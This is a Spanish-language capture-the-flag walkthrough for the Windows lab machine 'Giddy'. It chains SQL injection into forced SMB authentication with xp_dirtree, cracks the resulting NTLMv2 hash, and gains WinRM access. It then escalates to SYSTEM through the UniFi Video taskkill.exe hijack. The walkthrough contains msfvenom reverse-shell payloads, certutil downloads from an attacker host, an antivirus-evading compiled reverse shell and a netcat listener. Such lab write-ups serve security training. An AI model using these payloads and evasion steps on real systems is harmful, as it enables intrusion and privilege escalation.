Giddy
Publicado: 14 de Mayo de 2025 Autor: José Miguel Romero aKa x3m1Sec Dificultad: ⭐ Medium
📝 Descripción
Giddy es una máquina Windows de dificultad media que presenta múltiples vectores de ataque interesantes. La explotación inicial se logra a través de una vulnerabilidad de inyección SQL en una aplicación ASP.NET, permitiendo la captura de hashes NTLMv2 mediante técnicas de forzado de autenticación SMB. Una vez obtenido el acceso inicial, la escalada de privilegios se aprovecha de una configuración insegura en Ubiquiti UniFi Video, donde permisos heredados permiten la ejecución de código arbitrario como NT AUTHORITY\SYSTEM.
Esta máquina es ideal para practicar técnicas de explotación web, cracking de hashes, evasión de antivirus y escalada de privilegios en entornos Windows.
🎯 Objetivos
User Flag: Obtener acceso inicial mediante SQL injection y hash cracking
Root Flag: Escalar privilegios explotando permisos inseguros en servicios
🔭 Reconocimiento
🏓 Ping para verificación en base a TTL
❯ ping -c2 10.10.10.104
PING 10.10.10.104 (10.10.10.104) 56(84) bytes of data.
64 bytes from 10.10.10.104: icmp_seq=1 ttl=127 time=41.0 ms
64 bytes from 10.10.10.104: icmp_seq=2 ttl=127 time=42.2 ms
--- 10.10.10.104 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 40.967/41.571/42.175/0.604 ms💡 Nota: El TTL cercano a 128 sugiere que probablemente sea una máquina Windows.
🔍 Escaneo de puertos
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.104 | grep ^[0-9] | cut -d '/' -f1 | tr '\n' ',' | sed s/,$//) echo $ports
80,443,3389,5985🔧 Enumeración de servicios
nmap -sC -sV -p$ports 10.10.10.104 -oN services.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-13 20:27 CEST
Nmap scan report for 10.10.10.104
Host is up (0.043s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_ssl-date: 2025-06-13T18:27:39+00:00; 0s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
| ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite
| Not valid before: 2018-06-16T21:28:55
|_Not valid after: 2018-09-14T21:28:55
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Giddy
| Not valid before: 2025-06-12T18:18:53
|_Not valid after: 2025-12-12T18:18:53
| rdp-ntlm-info:
| Target_Name: GIDDY
| NetBIOS_Domain_Name: GIDDY
| NetBIOS_Computer_Name: GIDDY
| DNS_Domain_Name: Giddy
| DNS_Computer_Name: Giddy
| Product_Version: 10.0.14393
|_ System_Time: 2025-06-13T18:27:34+00:00
|_ssl-date: 2025-06-13T18:27:39+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
🌐 Enumeración Web
🔗 80 HTTP
Enumeramos el servicio http en el puerto 80 y no es que haya gran cosa aparte de una divertida y peculiar imagen:
📁 Fuzzing de directorios
Realizamos fuzzing de directorios para ver si encontramos algún recurso potencial que utilizar como vector de ataque. Para ello empleamos las herramientas dirsearch y feroxbuster:
dirsearch -u http://10.10.10.104 -x 503,404
Encontramos únicamente dos recursos que analizar en profundidad "/remote" y "/mvc".
🔐 /remote - Windows Powershell web access
Encontramos un panel de login de "Windows Powershell web access" aunque un mensaje nos indica que debemos autenticarnos desde la versión segura con https.
http://10.10.10.104/Remote/en-US/logon.aspx?ReturnUrl=%2fremote%2flogin
🕸️ /mvc - Aplicación en ASP.net
https://10.10.10.104/mvc/
💉 Explotación Inicial - SQL Injection
🔍 Identificación de la vulnerabilidad
Al enumerar la aplicación, vemos que se trata de un sitio web en desarrollo y cuando seleccionamos sobre algunos de los productos vemos un parámetro GET en la llamada que podría ser vulnerable a SQLi
Confirmamos la vulnerabilidad y enumeramos un usuario llamado jnogueira:
🎣 Captura de Hash NTLMv2
Al tratarse de una máquina windows, una de las cosas que merece la pena probar es intentar obtener un hash NTLMv2 forzando a la autenticación por parte del usuario de servicio de la base de datos contra un recureso de un servidor smb que levantemos en nuestro host de ataque usando imapacket de la siguiente forma:
impacket-smbserver smbShare $(pwd) -smb2support Usamos el siguiente payload. El carácter ";" lo inyectamos para cerrar la cosulta e iniciar otra en la que haremos una petición a nuestro recurso compartido:
; EXEC MASTER.sys.xp_dirtree '\\10.10.14.7\smbShare\test'🔓 Cracking del Hash
E inmediatamente recibimos un hash NTLMv2 de un usuario llamado stacy:
Intentamos crackearlo usando hashcat y obtenemos la contraseña de stacy
hashcat -m 5600 -a 0 stacy_hash /usr/share/wordlists/rockyou.txt
Credenciales obtenidas: stacy:xNnWo6272k7x
❌ Intento de conexión RDP
Verificamos que las credenciales son válidas con el servicio RDP sin embargo no parece que podamos conectarnos
netexec rdp 10.10.10.104 -u 'stacy' -p 'xNnWo6272k7x'
xfreerdp /u:'stacy' /p:'xNnWo6272k7x' /v:10.10.10.104 /drive:linux,/home/kpanic/ 
✅ Acceso vía WinRM
Verificamos si stacy está dentro del grupo Remote Management System y podemos acceder a través del protocolo winrm:
netexec winrm 10.10.10.104 -u 'stacy' -p 'xNnWo6272k7x'
Todo hace indicar que sí, así que usamos evil-winrm para ganar acceso a la máquinacon las credenciales de stacy:
evil-winrm -i 10.10.10.104 -u stacy -p 'xNnWo6272k7x' 
🌐 Autenticación alternativa con stacy a través de Windows Powershell Web Access
Podemos usar también las credenciales de stacy para acceder a la máquina a través de la herramienta WIndows Powershell Web access.
NOTA: Importante aquí especificar el carácter \ delante del usuario:
Accedemos al directorio Desktop del usuario stacy y obtenemos la primera flag:
*Evil-WinRM* PS C:\Users\Stacy\Desktop> dir
Directory: C:\Users\Stacy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/13/2025 2:19 PM 34 user.txt## 🔝 Escalada de Privilegios
🔍 Enumeración del sistema
Al enumerar el directorio Documents de Stacy vemos que contiene un archivo poco común:
*Evil-WinRM* PS C:\Users\Stacy\Documents> dir
Directory: C:\Users\Stacy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/17/2018 9:36 AM 6 unifivideo🎥 Investigación de Ubiquiti UniFi Video
Buscamos información pública sobre este archivo y parece pertenecer a Ubiquiti UniFi Video un software de videovigilancia de Ubiquiti usado para gestionar cámaras IP.
Buscamos posibles exploits sobre este software encontramos que existe uno y además que permite la escalada de privilegios en WIndows para la versión 3.7.3
Exploit Reference: https://www.exploit-db.com/exploits/43390
🔧 Análisis del Exploit
5. VULNERABILITY DETAILS
========================
Ubiquiti UniFi Video for Windows is installed to "C:\ProgramData\unifi-video\"
by default and is also shipped with a service called "Ubiquiti UniFi Video". Its
executable "avService.exe" is placed in the same directory and also runs under
the NT AUTHORITY/SYSTEM account.
However the default permissions on the "C:\ProgramData\unifi-video" folder are
inherited from "C:\ProgramData" and are not explicitly overridden, which allows
all users, even unprivileged ones, to append and write files to the application
directory:
c:\ProgramData>icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)
Upon start and stop of the service, it tries to load and execute the file at
"C:\ProgramData\unifi-video\taskkill.exe". However this file does not exist in
the application directory by default at all.
By copying an arbitrary "taskkill.exe" to "C:\ProgramData\unifi-video\" as an
unprivileged user, it is therefore possible to escalate privileges and execute
arbitrary code as NT AUTHORITY/SYSTEM.
Si miramos el detalle de la explotación nos indica que debería existir en el sistema una ruta: de instalación de la herramienta en C:\ProgramData\unifi-video que comprobamos que existe:
📋 Resumen del Exploit
Ubiquiti UniFi Video para Windows se instala por defecto en C:\ProgramData\unifi-video\ y también se entrega con un servicio llamado "Ubiquiti UniFi Video". Su ejecutable "avService.exe" se ubica en el mismo directorio y también se ejecuta bajo la cuenta NT AUTHORITY/SYSTEM.
Los permisos predeterminados de la carpeta C:\ProgramData\unifi-video se heredan de C:\ProgramData y no se anulan explícitamente, lo que permite a todos los usuarios, incluso a los sin privilegios, añadir y escribir archivos en el directorio de la aplicación.
Al iniciar y detener el servicio, se intenta cargar y ejecutar el archivo en C:\ProgramData\unifi-video\taskkill.exe. Sin embargo, este archivo no existe en el directorio de la aplicación por defecto.
Al copiar un archivo taskkill.exe arbitrario en C:\ProgramData\unifi-video\ como un usuario sin privilegios, es posible escalar privilegios y ejecutar código arbitrario como NT AUTHORITY/SYSTEM.
🛠️ Explotación para Escalada
🧪 Primer intento - Payload con msfvenom
Generamos un payload con msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.7 lport=443 -f exe > taskkill.exeInicio un servidor web en python en mi host de ataque para disponibilizar el payload:
python3 -m http.server 80Y ahora usando certutil lo descargo en el directorio C:\ProgramData\unifi-video
certutil -urlcache -f -split http://10.10.14.7/taskkill.exe
Pero parece que el antivirus Defender nos borra el ejecutable en cuanto lo detecta o en cuanto lo ejecutamos.
🛡️ Evasión de Antivirus
Usaremos prometheusuna simple shell inversa TCP de C++, que se usará para crear el archivo malicioso taskkill.exe. Se han cambiado los nombres de las funciones y se han eliminado los comentarios para reducir la probabilidad de detección por antivirus basado en firmas
📥 Descarga y configuración de Prometheus
Descargamos prometheus y editamos la IP y el puerto con el de nuestro host de ataque:
wget https://raw.githubusercontent.com/paranoidninja/0xdarkvortex-MalwareDevelopment/refs/heads/master/prometheus.cpp
Para compilar esta herramienta necesitaremos tener instalada la herramienta Mingw-w64.
apt-get install g++-mingw-w64Compilamos con el siguiente comando
i686-w64-mingw32-g++ prometheus.cpp -o taskkill.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
🎯 Ejecución del Exploit
Ahora inicamos un listener con netcat en el host de ataque donde recibiré la conexión reversa:
nc -nlvp 443Transferimos nuevamente el binario taskkill.exe generado con prometheus al host Giddy usando certutil:
certutil -urlcache -f -split http://10.10.14.7/taskkill.exeAhora nos queda únicamente detener e iniciar el servicio para que se realice la llamada a taskkill.exe como NT System. Pero antes debemos de saber cómo se llama el servicio y cómo detenerlo e iniciarlo.
Buscamos el nombre del servicio en el registro de la siguiente forma:
Set-Location 'HKLM:\SYSTEM\CurrentControlSet\Services'
dir *uni*Name: UniFiVideoService
DisplayName: Ubiquiti UniFi Video
Reiniciamos el servicio (es posible que requiera parar e iniciar varias veces)
Stop-Service "Ubiquiti UniFi Video"*Evil-WinRM* PS C:\ProgramData\unifi-video> Start-Service "Ubiquiti UniFi Video"
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to start...
*Evil-WinRM* PS C:\ProgramData\unifi-video> Stop-Service "Ubiquiti UniFi Video"
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...Start-Service "Ubiquiti UniFi Video"Recibiremos la reverse shell como NT System:
Last updated